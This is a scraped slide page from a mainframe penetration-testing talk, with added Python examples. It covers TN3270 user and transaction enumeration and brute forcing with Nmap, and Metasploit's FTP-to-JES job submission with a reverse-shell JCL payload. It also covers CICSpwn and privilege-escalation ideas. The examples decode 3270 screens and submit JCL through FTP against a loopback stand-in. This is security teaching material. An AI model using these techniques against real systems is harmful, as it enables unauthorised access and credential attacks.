AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 

Advanced mainframe hacking

  • 31. Nmap Scripting Engine (NSE)
    • Composed of libraries and scripts
    • Over 530 scripts available
    • 121 libraries
    • Written in Lua
  • 32. NSE script categories (the names you pass to --script): auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln
  • 33. TN3270 NSE Library
    • A 'virtual' TN3270 terminal written in Lua
    • Available at https://github.com/zedsec390/NMAP
    • Allows for the following:
  • 34. Invoke
    • To invoke scripts use the flag --script (\ is the line-continuation character in Linux):
      nmap -sV --script tn3270-screen
  • 36. Additional TN3270 Scripts
    • VTAM applid enumeration
    • TSO: user ID enumeration; password brute force
    • CICS: transaction enumeration; user ID enumeration; user password brute forcing
  • 38. TSO User Enumeration. Let's walk through the arguments (note the NSE libraries involved: brute and unpwdb):
    • brute.maxthreads=100: maximum number of concurrent connections, here set to 100
    • userdb='/tmp/users.txt': file with the user names you want to test
    • tso-enum.commands='TSOL5': the command used to get to TSO
  • 39. CICS Transaction Enumeration. Arguments:
    • brute.maxthreads=100: maximum number of concurrent connections, here set to 100
    • idlist='/tmp/users.txt': file with the CICS transaction IDs you are looking for
    • cics-enum.commands='CICSTS29': the command used to get to the CICS region
    • cics-enum.path='/home/test': screenshots of successfully identified transactions are written to this folder
  • 40. DEMO
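The TN3270 library on slide 33 is a 'virtual terminal', and that is what makes the scripts on slides 38 and 39 possible: tso-enum and cics-enum can only tell a valid user ID or transaction from an invalid one because the library turns the host's raw 3270 records into screen text that can be searched. The Python below is an added example written for this page, not the ZedSec390 Lua code: a decoder for the 3270 outbound data stream (write command, WCC, the SBA/SF/SFE/IC/RA/EUA/PT orders, EBCDIC text and the telnet IAC EOR framing) that rebuilds a 24x80 screen, lists its input fields, and applies the check the tso-enum documentation describes, namely that message IKJ56420I on the logon panel means the user ID exists but is not authorized for TSO. The sample record, the user ID TSTUSER and the field layout are constructed for the example, not a capture.

```python
"""Decode a 3270 outbound (host -> terminal) data stream into screen text.
Added example; not the ZedSec390 NSE library, which does the same job in Lua."""
import codecs

ROWS, COLS = 24, 80                       # model-2 screen
SIZE = ROWS * COLS
WRITE_COMMANDS = {0xF1: "Write", 0xF5: "Erase/Write", 0x7E: "Erase/Write Alternate"}
# orders that may appear inside the data stream
SF, SFE, SBA, IC, RA, PT, EUA, MF, SA = 0x1D, 0x29, 0x11, 0x13, 0x3C, 0x05, 0x12, 0x2C, 0x28
IAC, EOR = 0xFF, 0xEF                     # telnet framing around each 3270 record
PROTECTED = 0x20                          # bit in a field attribute byte


def decode_address(b1, b2):
    """Buffer address from the two bytes that follow SBA, RA or EUA."""
    if b1 & 0xC0 == 0:                        # 14-bit form: top two bits of b1 are zero
        return ((b1 & 0x3F) << 8) | b2
    return ((b1 & 0x3F) << 6) | (b2 & 0x3F)   # 12-bit form: six significant bits per byte


def from_telnet(record, tn3270e=False):
    """Undo telnet framing: drop IAC EOR, unescape IAC IAC, skip the 5-byte TN3270E header."""
    if record.endswith(bytes([IAC, EOR])):
        record = record[:-2]
    record = record.replace(bytes([IAC, IAC]), bytes([IAC]))
    return record[5:] if tn3270e else record


def _char(b):
    """One EBCDIC (code page 037) byte as text; NUL and other controls render blank."""
    return " " if b < 0x40 else codecs.decode(bytes([b]), "cp037")


class Screen:
    def __init__(self):
        self.cells = [" "] * SIZE
        self.fields = {}                      # field start address -> attribute byte
        self.cursor = 0

    def rows(self):
        return ["".join(self.cells[r * COLS:(r + 1) * COLS]).rstrip() for r in range(ROWS)]

    def text(self):
        return "\n".join(self.rows())

    def unprotected_fields(self):
        return sorted(a for a, attr in self.fields.items() if not attr & PROTECTED)

    def attr_at(self, addr):
        """Attribute of the field containing addr: nearest field start at or before it, wrapping."""
        if not self.fields:
            return 0
        before = [s for s in self.fields if s <= addr]
        return self.fields[max(before) if before else max(self.fields)]


def parse_stream(data):
    """Apply one write command to a fresh screen buffer and return the Screen."""
    screen = Screen()
    if data[0] not in WRITE_COMMANDS:
        raise ValueError("unsupported 3270 command 0x%02X" % data[0])
    i, pos = 2, 0                             # data[1] is the WCC; orders and text follow it
    while i < len(data):
        b = data[i]
        if b == SBA:                          # Set Buffer Address
            pos = decode_address(data[i + 1], data[i + 2]); i += 3
        elif b in (SF, SFE):                  # Start Field (Extended): attribute occupies one cell
            if b == SF:
                attr, i = data[i + 1], i + 2
            else:
                n = data[i + 1]
                pairs = data[i + 2:i + 2 + 2 * n]
                attr = next((pairs[k + 1] for k in range(0, 2 * n, 2) if pairs[k] == 0xC0), 0)
                i += 2 + 2 * n
            screen.fields[pos] = attr
            screen.cells[pos] = " "
            pos = (pos + 1) % SIZE
        elif b == IC:                         # Insert Cursor
            screen.cursor = pos; i += 1
        elif b in (RA, EUA):                  # Repeat to Address / Erase Unprotected to Address
            stop = decode_address(data[i + 1], data[i + 2])
            fill = _char(data[i + 3]) if b == RA else " "
            while True:                       # do-while: equal addresses mean the whole buffer
                if b == RA or (pos not in screen.fields and not screen.attr_at(pos) & PROTECTED):
                    screen.cells[pos] = fill
                pos = (pos + 1) % SIZE
                if pos == stop:
                    break
            i += 4 if b == RA else 3
        elif b == PT:                         # Program Tab: jump past the next unprotected attribute
            starts = screen.unprotected_fields()
            nxt = [s for s in starts if s > pos] or starts
            pos = (nxt[0] + 1) % SIZE if nxt else 0
            i += 1
        elif b == SA:                         # Set Attribute (colour etc.): no effect on text
            i += 3
        elif b == MF:                         # Modify Field: skip its attribute pairs
            i += 2 + 2 * data[i + 1]
        else:                                 # ordinary character
            screen.cells[pos] = _char(b)
            pos = (pos + 1) % SIZE
            i += 1
    return screen


def tso_enum_verdict(screen):
    """The check tso-enum documents: IKJ56420I means the user ID exists but cannot use TSO."""
    return "valid" if "IKJ56420I" in screen.text() else "no verdict"


def sample_stream():
    """Constructed Erase/Write record resembling a TSO logon panel reply (not a capture)."""
    e = lambda s: codecs.encode(s, "cp037")
    return (bytes([0xF5, 0xC3])                                        # Erase/Write, WCC
            + bytes([SBA, 0x40, 0x40, SF, 0xF0])                       # row 0 col 0: protected field
            + e("IKJ56420I Userid TSTUSER not authorized to use TSO")
            + bytes([SBA, 0xC1, 0x50, SF, 0xF0]) + e("ENTER USERID -")  # row 1 col 0
            + bytes([SBA, 0xC1, 0x5F, SF, 0x40, IC])                   # row 1 col 15: input field, cursor
            + bytes([RA, 0xC1, 0xE8, 0x00, SF, 0xF0])                  # NUL-fill to col 24, close field
            + bytes([IAC, EOR]))                                       # telnet end of record


if __name__ == "__main__":
    s = parse_stream(from_telnet(sample_stream()))
    print(s.text())
    print("cursor:", divmod(s.cursor, COLS), "input fields:", s.unprotected_fields(),
          "tso-enum verdict:", tso_enum_verdict(s))
```

The same decoder serves cics-enum: a transaction ID is judged valid or invalid from the text CICS paints in reply, so everything the scripts conclude rests on this buffer reconstruction being right, including the address arithmetic and the NUL-to-blank rule.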
  • 42. Metasploit Framework
    • Developed by H.D. Moore in 2003
    • Moved to Ruby in 2007
    • Created an easy-to-use exploit platform
    • Chad Rikansrud (@bigendiansmalls) added JCL and z/OS architecture support in 2016
  • 43. Using MSF
    • Run 'msfconsole'
    • To list all exploits: show exploits
    • Run the ONLY z/OS 'exploit' module: use exploit/mainframe/ftp/ftp_jcl_creds
    • Show the options with: show options
    • Fill in the options you need
    • Select which 'payload' you want to use
  • 44. Set options. Exploit options:
    • FTPUSER: user ID to use
    • FTPPASS: password to use
    • RHOST: FTP hostname/IP address of the target LPAR
    • RPORT: FTP port (use Nmap to find it)
  • 45. Metasploit Payload Options. Now select a payload: set payload cmd/mainframe/reverse_shell_jcl. Then change the payload options:
    • LHOST: our hostname or IP address
    • LPORT: the port you want Metasploit to open a listener on
  • 46. DEMO
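Behind ftp_jcl_creds (slides 43 to 45) is one property of the z/OS FTP server: after SITE FILETYPE=JES, a STOR no longer writes a data set but hands the uploaded text to JES as a job, and the 250 reply names the job ('It is known to JES as JOBnnnnn'); the reverse_shell_jcl payload is simply JCL sent that way. The Python below is an added example, not the Metasploit module's code: a client that performs that exchange with ftplib, and a constructed loopback stand-in for the z/OS FTP daemon so the exchange can be run without a mainframe. The credentials USER01/PASSW0RD, the job name PENTEST1, the job ID JOB00123 and the stand-in's reply texts other than the 'It is known to JES as' line are assumptions made for the example, and the submitted job runs IEFBR14 (a do-nothing program) rather than a shell.

```python
"""Submit JCL through the z/OS FTP server's JES interface (added example, not the
Metasploit module). The server below is a constructed stand-in for the z/OS FTP daemon."""
import io
import re
import socket
import threading
from ftplib import FTP

JES_REPLY = re.compile(r"It is known to JES as (JOB\d{5})")   # the real server's 250- line


def build_jcl(jobname, account, program="IEFBR14"):
    """A minimal job: job names are 1-8 characters and statements must fit in columns 1-71."""
    if not 1 <= len(jobname) <= 8 or not jobname.isalnum():
        raise ValueError("jobname must be 1-8 alphanumeric characters")
    lines = [
        f"//{jobname:<8} JOB ({account}),'JES SUBMIT',CLASS=A,MSGCLASS=H",
        f"//STEP1    EXEC PGM={program}",
    ]
    for line in lines:
        if len(line) > 71:
            raise ValueError("JCL statement exceeds column 71: " + line)
    return "\n".join(lines) + "\n"


def parse_jes_reply(reply):
    """Job ID from the STOR reply, or None when the upload was a plain file transfer."""
    m = JES_REPLY.search(reply)
    return m.group(1) if m else None


def submit_jcl(host, port, user, password, jcl):
    """Log in, switch the session to JES mode, STOR the job and return its JES job ID."""
    ftp = FTP()
    ftp.connect(host, port, timeout=5)
    ftp.login(user, password)
    ftp.sendcmd("SITE FILETYPE=JES")           # the one command that turns an upload into a submit
    reply = ftp.storlines("STOR JOB.JCL", io.BytesIO(jcl.encode("ascii")))
    ftp.quit()
    return parse_jes_reply(reply)


def fake_jes_ftpd(listener, job_id, captured):
    """Constructed stand-in for the z/OS FTP server: just enough protocol for submit_jcl()."""
    conn, _ = listener.accept()
    conn.settimeout(5)
    rfile = conn.makefile("rb")
    send = lambda line: conn.sendall((line + "\r\n").encode("ascii"))
    send("220 Constructed JES FTP stand-in ready")
    filetype, data_listener = "SEQ", None
    for raw in rfile:
        cmd, _, arg = raw.decode("ascii").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            send("331 Send password please.")
        elif cmd == "PASS":
            send("230 User logged on.")
        elif cmd == "TYPE":
            send("200 Representation type is Ascii NonPrint")
        elif cmd == "SITE":                    # FILETYPE=JES flips the session into submit mode
            filetype = "JES" if arg.upper() == "FILETYPE=JES" else filetype
            send("200 SITE command was accepted")
        elif cmd == "PASV":
            data_listener = socket.socket()
            data_listener.bind(("127.0.0.1", 0))
            data_listener.listen(1)
            data_listener.settimeout(5)
            p = data_listener.getsockname()[1]
            send(f"227 Entering Passive Mode (127,0,0,1,{p // 256},{p % 256})")
        elif cmd == "STOR":
            send("150 Opening ASCII mode data connection")
            data, _ = data_listener.accept()
            body = b"".join(iter(lambda: data.recv(4096), b""))
            data.close()
            data_listener.close()
            captured["jcl"] = body.decode("ascii")   # what the internal reader would receive
            if filetype == "JES":
                send(f"250-It is known to JES as {job_id}")
            send("250 Transfer completed successfully.")
        elif cmd == "QUIT":
            send("221 Quit command received. Goodbye.")
            break
        else:
            send("502 Command not implemented.")
    conn.close()


def demo(job_id="JOB00123"):
    """Run the whole exchange on loopback; returns (job ID seen by the client, JCL the server got)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    listener.settimeout(5)
    captured = {}
    t = threading.Thread(target=fake_jes_ftpd, args=(listener, job_id, captured), daemon=True)
    t.start()
    jcl = build_jcl("PENTEST1", "ACCT")          # constructed job name and account
    got = submit_jcl("127.0.0.1", listener.getsockname()[1], "USER01", "PASSW0RD", jcl)
    t.join(5)
    listener.close()
    return got, captured.get("jcl", "")


if __name__ == "__main__":
    print(demo())
```

The defensive reading of the same exchange: any FTP credential that can reach the server's JES interface is a job-submission credential, so FTP logins followed by SITE FILETYPE=JES from unexpected clients are worth alerting on, and surfacing JES to FTP users who only need file transfer is worth revisiting.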
  • 49. CICSpwn
    • Released this year by Ayoul3
    • Relies on the CEMT/CEDA transaction IDs being reachable (for now)
    • Uses CEMT to upload and execute JCL/REXX
    • Can be used to assess CICS and break into environments
    • Requires Python 2.7
  • 50. Interesting Options. Invoke with: python cicspwn.py
    • -i: gather information
    • -A: test all options
    • -s: upload JCL to be executed under the CICS user (requires CEMT)
    • --bypass: bypass RACF if CEDA is available
  • 51. DEMO
  • 54. Escalation
    • So far everything has been network based
    • What happens after access is granted?
  • 55. Some Ideas
    • Storage 'scrapers' to gather system information (think 'IPLINFO', but built into Metasploit)
    • Automated APF tools that attempt privilege escalation by zapping APF-authorized modules
    • Data-dumping tools to grab all data sets
    • SMP/E corruption
  • 56. Why Not?
    • Make your own tools? I'd prefer the tools come with what the experts need, so they have it without knowing about it.
  • 58. Thank you! SECURITY & COMPLIANCE CONFERENCE 2016